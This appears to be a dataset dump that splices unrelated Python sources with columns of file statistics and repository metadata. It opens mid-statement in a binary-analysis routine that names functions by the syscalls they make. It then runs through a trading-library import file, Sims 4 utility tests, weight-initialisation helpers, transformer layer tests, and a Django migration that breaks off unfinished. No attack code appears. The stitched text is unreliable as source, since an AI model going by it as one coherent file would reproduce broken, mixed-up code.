and isinstance(stmt.kind.label, IndirectLabel):
if isinstance(stmt.kind.label.exp, LoadExp):
base_pointer, offset, access = mem_addr(stmt.kind.label.exp, blk, stmt.pc)
if base_pointer is not None and base_pointer.base_register == 'RSP':
make_temp_offset(base_pointer.base_register, offset, blk, stmt.pc)
elif isinstance(stmt.kind.label.exp, VirtualExp) \
and isinstance(get_virtual_exp(stmt.kind.label.exp, blk).exp, LoadExp):
base_pointer, offset, access = mem_addr(stmt.kind.label.exp, blk, stmt.pc)
if base_pointer is not None and base_pointer.base_register == 'RSP':
make_temp_offset(base_pointer.base_register, offset, blk, stmt.pc)
def arm_temp_offsets(blk):
pass
def temp_offsets(blk):
if blk.binary.config.MACHINE_ARCH == 'x86':
x86_temp_offsets(blk)
elif blk.binary.config.MACHINE_ARCH == 'x64':
x64_temp_offsets(blk)
elif blk.binary.config.MACHINE_ARCH == 'ARM':
arm_temp_offsets(blk)
def x86_syscalls(stmt, stmt_next, function):
if isinstance(stmt, DefStmt) \
and stmt.insn is not None \
and stmt.insn.startswith('MOV') \
and isinstance(stmt.lhs, RegVar) \
and stmt.lhs.name == 'EAX' \
and isinstance(stmt.rhs, IntExp) \
and stmt.rhs.value in function.binary.config.SYSCALL_TABLE \
and stmt.pc is not None \
and function.binary.insn_map.get_pc(stmt.pc) > stmt.pc:
syscall_value = stmt.rhs.value
if syscall_value == 0x66:
if isinstance(stmt_next, DefStmt) \
and stmt_next.insn is not None \
and stmt_next.insn.startswith('MOV') \
and isinstance(stmt_next.lhs, RegVar) \
and stmt_next.lhs.name == 'EBX' \
and isinstance(stmt_next.rhs, IntExp) \
and stmt_next.rhs.value in X86_SOCKETCALL_ARGS:
function.syscalls.add(0x66 * 100 + stmt_next.rhs.value)
else:
if function.binary.insn_map.get_insn(function.binary.insn_map.get_pc(stmt.pc)) == 'INT':
function.syscalls.add(syscall_value)
def x64_syscalls(stmt, function):
if isinstance(stmt, DefStmt) \
and stmt.insn is not None \
and stmt.insn.startswith('MOV') \
and isinstance(stmt.lhs, RegVar) \
and stmt.lhs.name == 'RAX' \
and isinstance(stmt.rhs, IntExp) \
and stmt.rhs.value in function.binary.config.SYSCALL_TABLE \
and stmt.pc is not None \
and function.binary.insn_map.get_pc(stmt.pc) > stmt.pc \
and function.binary.insn_map.get_insn(function.binary.insn_map.get_pc(stmt.pc)) == 'SYSCALL':
function.syscalls.add(stmt.rhs.value)
def arm_syscalls(stmt, function):
if isinstance(stmt, DefStmt) \
and stmt.insn is not None \
and stmt.insn.startswith('MOV') \
and isinstance(stmt.lhs, RegVar) \
and stmt.lhs.name == 'R7' \
and isinstance(stmt.rhs, IntExp) \
and stmt.rhs.value in function.binary.config.SYSCALL_TABLE \
and stmt.pc is not None \
and function.binary.insn_map.get_pc(stmt.pc) > stmt.pc \
and function.binary.insn_map.get_insn(function.binary.insn_map.get_pc(stmt.pc)) == 'SVC':
function.syscalls.add(stmt.rhs.value)
def syscalls(functions):
added_names_count = dict()
for function in functions.functions:
if not function.name.startswith('sub_'):
if function.name not in added_names_count:
added_names_count[function.name] = 0
added_names_count[function.name] += 1
for function in functions.functions:
if len(function.bap.blks) < 25:
for blk in function.bap.blks:
if function.binary.config.MACHINE_ARCH == 'x86':
if len(blk.stmts) >= 2:
for stmt, stmt_next in zip(blk.stmts, blk.stmts[1:]):
x86_syscalls(stmt, stmt_next, function)
else:
for stmt in blk.stmts:
if function.binary.config.MACHINE_ARCH == 'x64':
x64_syscalls(stmt, function)
elif function.binary.config.MACHINE_ARCH == 'ARM':
arm_syscalls(stmt, function)
if len(function.syscalls) == 1:
syscall_value = list(function.syscalls)[0]
function_name = function.binary.config.SYSCALL_TABLE[syscall_value]
if function_name not in added_names_count:
added_names_count[function_name] = 1
else:
added_names_count[function_name] += 1
function_name += '_' + str(added_names_count[function_name] - 1)
# print('{} {} {} {}'.format(format(function.low_pc, '02x'), format(syscall_value, '02x'), function_name, len(function.bap.blks)))
function.is_name_given = True
function.is_run_init = False
function.name = function_name
function.train_name = function_name
function.test_name = function_name
| 49.837881
| 146
| 0.511417
| 3,473
| 31,049
| 4.325655
| 0.049525
| 0.071757
| 0.052054
| 0.022366
| 0.861679
| 0.842974
| 0.802303
| 0.792585
| 0.781934
| 0.729215
| 0
| 0.008431
| 0.404039
| 31,049
| 622
| 147
| 49.918006
| 0.803448
| 0.004123
| 0
| 0.703041
| 0
| 0
| 0.023578
| 0
| 0
| 0
| 0.000259
| 0
| 0
| 1
| 0.042934
| false
| 0.001789
| 0.014311
| 0
| 0.057245
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8dfcd0c6ffb177c5a90563ce31ed585be3b3923b
| 115
|
py
|
Python
|
tensortrade/strategies/__init__.py
|
ult-processor/tensortrade
|
c2848f3bc33295085c31b8ad774c6e12f23210ea
|
[
"Apache-2.0"
] | 1
|
2019-10-14T12:45:12.000Z
|
2019-10-14T12:45:12.000Z
|
tensortrade/strategies/__init__.py
|
plutusmens/tensortrade
|
16d1113621d435d0dfdd5eabbe3d7e4658f7178a
|
[
"Apache-2.0"
] | null | null | null |
tensortrade/strategies/__init__.py
|
plutusmens/tensortrade
|
16d1113621d435d0dfdd5eabbe3d7e4658f7178a
|
[
"Apache-2.0"
] | null | null | null |
from .trading_strategy import TradingStrategy
from .tensorforce_trading_strategy import TensorforceTradingStrategy
| 38.333333
| 68
| 0.913043
| 11
| 115
| 9.272727
| 0.636364
| 0.294118
| 0.411765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069565
| 115
| 2
| 69
| 57.5
| 0.953271
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
30b7d11624c9c01286ef624a969daff859f4e832
| 10,909
|
py
|
Python
|
Scripts/s4cl_tests/utils/common_collection_utils_tests.py
|
ColonolNutty/Sims4CommunityLibrary
|
684f28dc3c7deb4d9fd520e21e63942b65a91d31
|
[
"CC-BY-4.0"
] | 118
|
2019-08-31T04:33:18.000Z
|
2022-03-28T21:12:14.000Z
|
Scripts/s4cl_tests/utils/common_collection_utils_tests.py
|
ColonolNutty/Sims4CommunityLibrary
|
684f28dc3c7deb4d9fd520e21e63942b65a91d31
|
[
"CC-BY-4.0"
] | 15
|
2019-12-05T01:29:46.000Z
|
2022-02-18T17:13:46.000Z
|
Scripts/s4cl_tests/utils/common_collection_utils_tests.py
|
ColonolNutty/Sims4CommunityLibrary
|
684f28dc3c7deb4d9fd520e21e63942b65a91d31
|
[
"CC-BY-4.0"
] | 28
|
2019-09-07T04:11:05.000Z
|
2022-02-07T18:31:40.000Z
|
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from pprint import pformat
from typing import List, Set, Tuple, Dict, Any
from sims4communitylib.modinfo import ModInfo
from sims4communitylib.utils.common_collection_utils import CommonCollectionUtils
from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils
from sims4communitylib.testing.common_test_service import CommonTestService
# noinspection PyMissingOrEmptyDocstring
@CommonTestService.test_class(ModInfo.get_identity())
class CommonCollectionUtilsTests:
@staticmethod
@CommonTestService.test((1, 2, 3), (2,))
@CommonTestService.test((1, 2, 3), (4,), (2,))
@CommonTestService.test((1, 2, 3), (4, 7), (5, 6), (3,))
def _should_intersect_true(list_one, *list_items) -> None:
result = CommonCollectionUtils.intersects(list_one, *list_items)
CommonAssertionUtils.is_true(result)
@staticmethod
@CommonTestService.test((1, 2, 3), (4, 8))
@CommonTestService.test((1, 2, 3), (5, 9,), (10, 4))
def _should_intersect_false(list_one: List[int], *list_items: int) -> None:
result = CommonCollectionUtils.intersects(list_one, *list_items)
CommonAssertionUtils.is_false(result)
@staticmethod
@CommonTestService.test([1, 2, 3], 2, {(1, 2), (1, 3), (2, 3)})
def _should_combine(items: List[int], combination_length: int, expected_outcome: Set[Tuple[int]]) -> None:
result = CommonCollectionUtils.create_possible_combinations(items, combination_length)
CommonAssertionUtils.are_equal(result, expected_outcome)
@staticmethod
@CommonTestService.test({'a': 1, 'b': 2, 'test_coll': (1, 2, 3)}, {'a': 5, 'c': 6, 'test_coll': (3, 4, 5, 6), 'test_other_coll': (24, 25)})
def _should_merge_dictionaries(dictionary_one: Dict[str, Any], dictionary_two: Dict[str, Any]) -> None:
result_dict = CommonCollectionUtils.merge_dict(dictionary_one, dictionary_two)
CommonAssertionUtils.contains(result_dict, 'a', message=pformat(result_dict))
CommonAssertionUtils.contains(result_dict, 'b', message=pformat(result_dict))
CommonAssertionUtils.contains(result_dict, 'c', message=pformat(result_dict))
CommonAssertionUtils.contains(result_dict, 'test_coll', message=pformat(result_dict))
CommonAssertionUtils.contains(result_dict, 'test_other_coll', message=pformat(result_dict))
a_val = result_dict['a']
CommonAssertionUtils.are_equal(a_val, 5, message=pformat(result_dict))
b_val = result_dict['b']
CommonAssertionUtils.are_equal(b_val, 2, message=pformat(result_dict))
c_val = result_dict['c']
CommonAssertionUtils.are_equal(c_val, 6, message=pformat(result_dict))
test_coll_val = result_dict['test_coll']
CommonAssertionUtils.contains(test_coll_val, 1, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 2, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 3, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 4, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 5, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 6, message=pformat(result_dict))
count_of_test_val = 0
for val in test_coll_val:
if val == 3:
count_of_test_val += 1
CommonAssertionUtils.are_equal(count_of_test_val, 2, message='The number of 3s were not correct! {}'.format(pformat(result_dict)))
test_other_coll_val = result_dict['test_other_coll']
CommonAssertionUtils.contains(test_other_coll_val, 24, message=pformat(result_dict))
CommonAssertionUtils.contains(test_other_coll_val, 25, message=pformat(result_dict))
@staticmethod
@CommonTestService.test({'a': 1, 'b': 2, 'test_coll': (1, 2, 3)}, {'a': 5, 'c': 6, 'test_coll': (3, 4, 5, 6), 'test_other_coll': (24, 25)})
def _should_merge_dictionaries_allow_duplicates_false(dictionary_one: Dict[str, Any], dictionary_two: Dict[str, Any]) -> None:
result_dict = CommonCollectionUtils.merge_dict(dictionary_one, dictionary_two, allow_duplicates_in_collections=False)
CommonAssertionUtils.contains(result_dict, 'a', message=pformat(result_dict))
CommonAssertionUtils.contains(result_dict, 'b', message=pformat(result_dict))
CommonAssertionUtils.contains(result_dict, 'c', message=pformat(result_dict))
CommonAssertionUtils.contains(result_dict, 'test_coll', message=pformat(result_dict))
CommonAssertionUtils.contains(result_dict, 'test_other_coll', message=pformat(result_dict))
a_val = result_dict['a']
CommonAssertionUtils.are_equal(a_val, 5, message=pformat(result_dict))
b_val = result_dict['b']
CommonAssertionUtils.are_equal(b_val, 2, message=pformat(result_dict))
c_val = result_dict['c']
CommonAssertionUtils.are_equal(c_val, 6, message=pformat(result_dict))
test_coll_val = result_dict['test_coll']
CommonAssertionUtils.contains(test_coll_val, 1, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 2, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 3, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 4, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 5, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 6, message=pformat(result_dict))
count_of_test_val = 0
for val in test_coll_val:
if val == 3:
count_of_test_val += 1
CommonAssertionUtils.are_equal(count_of_test_val, 1, message='The number of 3s were not correct! {}'.format(pformat(result_dict)))
test_other_coll_val = result_dict['test_other_coll']
CommonAssertionUtils.contains(test_other_coll_val, 24, message=pformat(result_dict))
CommonAssertionUtils.contains(test_other_coll_val, 25, message=pformat(result_dict))
@staticmethod
@CommonTestService.test({'a': 1, 'b': 2, 'test_coll': (1, 2, 3)}, {'a': 5, 'c': 6, 'test_coll': (3, 4, 5, 6), 'test_other_coll': (24, 25)})
def _should_merge_dictionaries_prefer_source_false(dictionary_one: Dict[str, Any], dictionary_two: Dict[str, Any]) -> None:
result_dict = CommonCollectionUtils.merge_dict(dictionary_one, dictionary_two, prefer_source_values=False)
CommonAssertionUtils.contains(result_dict, 'a', message=pformat(result_dict))
CommonAssertionUtils.contains(result_dict, 'b', message=pformat(result_dict))
CommonAssertionUtils.contains(result_dict, 'c', message=pformat(result_dict))
CommonAssertionUtils.contains(result_dict, 'test_coll', message=pformat(result_dict))
CommonAssertionUtils.contains(result_dict, 'test_other_coll', message=pformat(result_dict))
a_val = result_dict['a']
CommonAssertionUtils.are_equal(a_val, 1, message=pformat(result_dict))
b_val = result_dict['b']
CommonAssertionUtils.are_equal(b_val, 2, message=pformat(result_dict))
c_val = result_dict['c']
CommonAssertionUtils.are_equal(c_val, 6, message=pformat(result_dict))
test_coll_val = result_dict['test_coll']
CommonAssertionUtils.contains(test_coll_val, 1, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 2, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 3, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 4, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 5, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 6, message=pformat(result_dict))
count_of_test_val = 0
for val in test_coll_val:
if val == 3:
count_of_test_val += 1
CommonAssertionUtils.are_equal(count_of_test_val, 2, message='The number of 3s were not correct! {}'.format(pformat(result_dict)))
test_other_coll_val = result_dict['test_other_coll']
CommonAssertionUtils.contains(test_other_coll_val, 24, message=pformat(result_dict))
CommonAssertionUtils.contains(test_other_coll_val, 25, message=pformat(result_dict))
@staticmethod
@CommonTestService.test({'a': 1, 'b': 2, 'test_coll': (1, 2, 3)}, {'a': 5, 'c': 6, 'test_coll': (3, 4, 5, 6), 'test_other_coll': (24, 25)})
def _should_merge_dictionaries_prefer_source_false_allow_duplicates_false(dictionary_one: Dict[str, Any], dictionary_two: Dict[str, Any]) -> None:
result_dict = CommonCollectionUtils.merge_dict(dictionary_one, dictionary_two, prefer_source_values=False, allow_duplicates_in_collections=False)
CommonAssertionUtils.contains(result_dict, 'a', message=pformat(result_dict))
CommonAssertionUtils.contains(result_dict, 'b', message=pformat(result_dict))
CommonAssertionUtils.contains(result_dict, 'c', message=pformat(result_dict))
CommonAssertionUtils.contains(result_dict, 'test_coll', message=pformat(result_dict))
CommonAssertionUtils.contains(result_dict, 'test_other_coll', message=pformat(result_dict))
a_val = result_dict['a']
CommonAssertionUtils.are_equal(a_val, 1, message=pformat(result_dict))
b_val = result_dict['b']
CommonAssertionUtils.are_equal(b_val, 2, message=pformat(result_dict))
c_val = result_dict['c']
CommonAssertionUtils.are_equal(c_val, 6, message=pformat(result_dict))
test_coll_val = result_dict['test_coll']
CommonAssertionUtils.contains(test_coll_val, 1, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 2, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 3, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 4, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 5, message=pformat(result_dict))
CommonAssertionUtils.contains(test_coll_val, 6, message=pformat(result_dict))
count_of_test_val = 0
for val in test_coll_val:
if val == 3:
count_of_test_val += 1
CommonAssertionUtils.are_equal(count_of_test_val, 1, message='The number of 3s were not correct! {}'.format(pformat(result_dict)))
test_other_coll_val = result_dict['test_other_coll']
CommonAssertionUtils.contains(test_other_coll_val, 24, message=pformat(result_dict))
CommonAssertionUtils.contains(test_other_coll_val, 25, message=pformat(result_dict))
| 66.518293
| 153
| 0.731598
| 1,370
| 10,909
| 5.522628
| 0.083942
| 0.148031
| 0.152789
| 0.203013
| 0.885012
| 0.88184
| 0.881708
| 0.858842
| 0.858842
| 0.858842
| 0
| 0.020074
| 0.155193
| 10,909
| 163
| 154
| 66.92638
| 0.80089
| 0.026767
| 0
| 0.80137
| 0
| 0
| 0.048261
| 0
| 0
| 0
| 0
| 0
| 0.493151
| 1
| 0.047945
| false
| 0
| 0.041096
| 0
| 0.09589
| 0.006849
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
30bb0d29ea24672fa253627b23ef40d20610ae5a
| 4,873
|
py
|
Python
|
carla/agents/utils/weight_init.py
|
sebzap/CarlaRL
|
5283d15dee9e8dc5e728314d56875b4fbca3acb2
|
[
"MIT"
] | 6
|
2021-07-14T09:19:04.000Z
|
2022-01-18T07:59:20.000Z
|
carla/agents/utils/weight_init.py
|
sebzap/CarlaRL
|
5283d15dee9e8dc5e728314d56875b4fbca3acb2
|
[
"MIT"
] | null | null | null |
carla/agents/utils/weight_init.py
|
sebzap/CarlaRL
|
5283d15dee9e8dc5e728314d56875b4fbca3acb2
|
[
"MIT"
] | 1
|
2021-12-14T15:07:33.000Z
|
2021-12-14T15:07:33.000Z
|
"""
Created by Hamid Eghbal-zadeh at 19.11.20
Johannes Kepler University of Linz
"""
import torch.nn as nn
import math
import torch.nn.init as init
import torch
def weights_init_kaiming_normal(net):
'''Init layer parameters.'''
for m in net.modules():
if isinstance(m, nn.Conv2d):
init.kaiming_normal_(m.weight, mode='fan_out')
if m.bias is not None:
init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
init.constant_(m.weight, 1)
init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
init.kaiming_normal_(m.weight, mode='fan_out')
init.constant_(m.bias, 0)
elif type(m) in [nn.GRU, nn.LSTM, nn.RNN]:
for name, param in m.named_parameters():
if 'weight_ih' in name:
init.kaiming_normal_(param.data, mode='fan_out')
elif 'weight_hh' in name:
init.kaiming_normal_(param.data, mode='fan_out')
elif 'bias' in name:
param.data.fill_(0)
def weights_init_kaiming_uniform(net):
'''Init layer parameters.'''
for m in net.modules():
if isinstance(m, nn.Conv2d):
init.kaiming_uniform_(m.weight, mode='fan_out')
if m.bias is not None:
init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
init.constant_(m.weight, 1)
init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
init.kaiming_uniform_(m.weight, mode='fan_out')
init.constant_(m.bias, 0)
elif type(m) in [nn.GRU, nn.LSTM, nn.RNN]:
for name, param in m.named_parameters():
if 'weight_ih' in name:
init.kaiming_uniform_(param.data, mode='fan_out')
elif 'weight_hh' in name:
init.kaiming_uniform_(param.data, mode='fan_out')
elif 'bias' in name:
param.data.fill_(0)
def weights_init_xavier_with_nonlin(net,nonlin='relu'):
'''Init layer parameters.'''
for m in net.modules():
if isinstance(m, nn.Conv2d):
nn.init.xavier_uniform_(m.weight, gain=nn.init.calculate_gain(nonlin))
if m.bias is not None:
init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
init.constant_(m.weight, 1)
init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.xavier_uniform_(m.weight, gain=nn.init.calculate_gain(nonlin))
init.constant_(m.bias, 0)
def weights_init_xavier(module):
if isinstance(module, nn.Conv2d):
init.xavier_uniform_(module.weight.data,1.)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.BatchNorm2d):
module.weight.data.fill_(1)
module.bias.data.zero_()
elif isinstance(module, nn.Linear):
module.bias.data.zero_()
def lecun_normal_(tensor):
mode = 'fan_in'
gain = 1.
fan = init._calculate_correct_fan(tensor, mode)
std = gain / math.sqrt(fan)
with torch.no_grad():
return tensor.normal_(0, std)
def weights_init_lecun(net):
'''Init layer parameters.'''
for m in net.modules():
if isinstance(m, nn.Conv2d):
lecun_normal_(m.weight)
if m.bias is not None:
init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
init.constant_(m.weight, 1)
init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
lecun_normal_(m.weight)
init.constant_(m.bias, 0)
elif type(m) in [nn.GRU, nn.LSTM, nn.RNN]:
for name, param in m.named_parameters():
if 'weight_ih' in name:
lecun_normal_(param.data)
elif 'weight_hh' in name:
lecun_normal_(param.data)
elif 'bias' in name:
param.data.fill_(0)
def he_normal_(tensor):
mode = 'fan_in'
gain = 2.
fan = init._calculate_correct_fan(tensor, mode)
std = gain / math.sqrt(fan)
with torch.no_grad():
return tensor.normal_(0, std)
def weights_init_he(net):
'''Init layer parameters.'''
for m in net.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
init.constant_(m.weight, 1)
init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
init.constant_(m.bias, 0)
| 35.057554
| 82
| 0.575621
| 652
| 4,873
| 4.127301
| 0.121166
| 0.039019
| 0.096618
| 0.09476
| 0.856559
| 0.837235
| 0.818655
| 0.800074
| 0.760684
| 0.749164
| 0
| 0.013885
| 0.305356
| 4,873
| 138
| 83
| 35.311594
| 0.781093
| 0.039196
| 0
| 0.823009
| 0
| 0
| 0.034416
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.070796
| false
| 0
| 0.035398
| 0
| 0.123894
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
30c0de55826a83822e34859d9ab4e700c4d542b4
| 3,241
|
py
|
Python
|
tests/nn/modules/test_transformer.py
|
gooppe/deep-summarization-toolkit
|
e249b7c31c817fedbc3133a3799c23a0115091bd
|
[
"MIT"
] | 7
|
2019-05-30T18:19:42.000Z
|
2020-03-25T06:52:40.000Z
|
tests/nn/modules/test_transformer.py
|
gooppe/deep-summarization-toolkit
|
e249b7c31c817fedbc3133a3799c23a0115091bd
|
[
"MIT"
] | null | null | null |
tests/nn/modules/test_transformer.py
|
gooppe/deep-summarization-toolkit
|
e249b7c31c817fedbc3133a3799c23a0115091bd
|
[
"MIT"
] | 3
|
2019-05-26T18:45:15.000Z
|
2020-03-24T20:20:46.000Z
|
import unittest
import torch
from dst.nn import PBATransformerEncoderLayer, PBATransformerDecoderLayer
class TestPBATransformerEncoderLayer(unittest.TestCase):
def test_homogeneous_forward(self):
dim_m, dim_proj, dim_i, dropout = 32, 16, 64, 0.1
attention = "homogeneous"
attention_args = dict(head_convs=(3, 2, 3))
batch_size, seq_len = 8, 7
input = torch.randn(batch_size, seq_len, dim_m)
layer = PBATransformerEncoderLayer(dim_m, dim_proj, dim_i, dropout, attention, **attention_args)
out = layer(input)
self.assertTupleEqual(out.shape, input.shape)
def test_heterogeneous_forward(self):
dim_m, dim_proj, dim_i, dropout = 32, 16, 64, 0.1
attention = "heterogeneous"
attention_args = dict(head_convs=(1, 0, 3), n_heads=8)
batch_size, seq_len = 8, 7
input = torch.randn(batch_size, seq_len, dim_m)
layer = PBATransformerEncoderLayer(dim_m, dim_proj, dim_i, dropout, attention, **attention_args)
out = layer(input)
self.assertTupleEqual(out.shape, input.shape)
def test_interleaved_forward(self):
dim_m, dim_proj, dim_i, dropout = 32, 16, 64, 0.1
attention = "interleaved"
batch_size, seq_len = 8, 7
input = torch.randn(batch_size, seq_len, dim_m)
layer = PBATransformerEncoderLayer(dim_m, dim_proj, dim_i, dropout, attention)
out = layer(input)
self.assertTupleEqual(out.shape, input.shape)
class TestPBATransformerDecoderLayer(unittest.TestCase):
def test_homogeneous_forward(self):
dim_m, dim_proj, dim_i, dropout = 32, 16, 64, 0.1
attention = "homogeneous"
attention_args = dict(head_convs=(3, 2, 3))
batch_size, inp_seq_len, enc_seq_len = 8, 7, 9
input_seq = torch.randn(batch_size, inp_seq_len, dim_m)
encoder_seq = torch.randn(batch_size, enc_seq_len, dim_m)
layer = PBATransformerDecoderLayer(dim_m, dim_proj, dim_i, dropout, attention, **attention_args)
out = layer(input_seq, encoder_seq)
self.assertTupleEqual(out.shape, input_seq.shape)
def test_heterogeneous_forward(self):
dim_m, dim_proj, dim_i, dropout = 32, 16, 64, 0.1
attention = "heterogeneous"
attention_args = dict(head_convs=(1, 0, 3), n_heads=8)
batch_size, inp_seq_len, enc_seq_len = 8, 7, 9
input_seq = torch.randn(batch_size, inp_seq_len, dim_m)
encoder_seq = torch.randn(batch_size, enc_seq_len, dim_m)
layer = PBATransformerDecoderLayer(dim_m, dim_proj, dim_i, dropout, attention, **attention_args)
out = layer(input_seq, encoder_seq)
self.assertTupleEqual(out.shape, input_seq.shape)
def test_interleaved_forward(self):
dim_m, dim_proj, dim_i, dropout = 32, 16, 64, 0.1
attention = "interleaved"
batch_size, inp_seq_len, enc_seq_len = 8, 7, 9
input_seq = torch.randn(batch_size, inp_seq_len, dim_m)
encoder_seq = torch.randn(batch_size, enc_seq_len, dim_m)
layer = PBATransformerDecoderLayer(dim_m, dim_proj, dim_i, dropout, attention)
out = layer(input_seq, encoder_seq)
self.assertTupleEqual(out.shape, input_seq.shape)
| 38.583333
| 104
| 0.680037
| 448
| 3,241
| 4.627232
| 0.120536
| 0.040521
| 0.040521
| 0.063676
| 0.921852
| 0.921852
| 0.921852
| 0.921852
| 0.921852
| 0.903521
| 0
| 0.030519
| 0.221537
| 3,241
| 83
| 105
| 39.048193
| 0.791122
| 0
| 0
| 0.883333
| 0
| 0
| 0.021598
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.1
| false
| 0
| 0.05
| 0
| 0.183333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a5108022a529dd693bc4207fa9dfd8bc7898e2c2
| 3,316
|
py
|
Python
|
api/migrations/0001_initial.py
|
feemagdev/appointment-project-rest-api
|
2d74d23d73e37f5181bc22f53ac4c8cba7a7423b
|
[
"MIT"
] | null | null | null |
api/migrations/0001_initial.py
|
feemagdev/appointment-project-rest-api
|
2d74d23d73e37f5181bc22f53ac4c8cba7a7423b
|
[
"MIT"
] | null | null | null |
api/migrations/0001_initial.py
|
feemagdev/appointment-project-rest-api
|
2d74d23d73e37f5181bc22f53ac4c8cba7a7423b
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2 on 2021-01-26 04:32
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='BusinessClient',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('company', models.CharField(max_length=10)),
('contact', models.CharField(max_length=10)),
('phone', models.CharField(max_length=10, unique=True)),
('address', models.CharField(max_length=255)),
('city', models.CharField(max_length=255)),
('state', models.CharField(max_length=2)),
('zipcode', models.CharField(max_length=15)),
],
),
migrations.CreateModel(
name='Client',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('last_name', models.CharField(max_length=255)),
('phone', models.CharField(max_length=10, unique=True)),
('address', models.CharField(max_length=255)),
('city', models.CharField(max_length=255)),
('state', models.CharField(max_length=2)),
('zipcode', models.CharField(max_length=15)),
],
),
migrations.CreateModel(
name='Employee',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('phone', models.CharField(max_length=10, unique=True)),
],
),
migrations.CreateModel(
name='PersonalAppointment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('appointment_date', models.DateField()),
('appointment_time', models.TimeField()),
('confirmed', models.BooleanField()),
('date_added', models.DateTimeField()),
('client_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Client')),
('employee_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Employee')),
],
),
migrations.CreateModel(
name='BusinessAppointment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('appointment_date', models.DateField()),
('appointment_time', models.TimeField()),
('confirmed', models.BooleanField()),
('date_added', models.DateTimeField()),
('bclient_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.BusinessClient')),
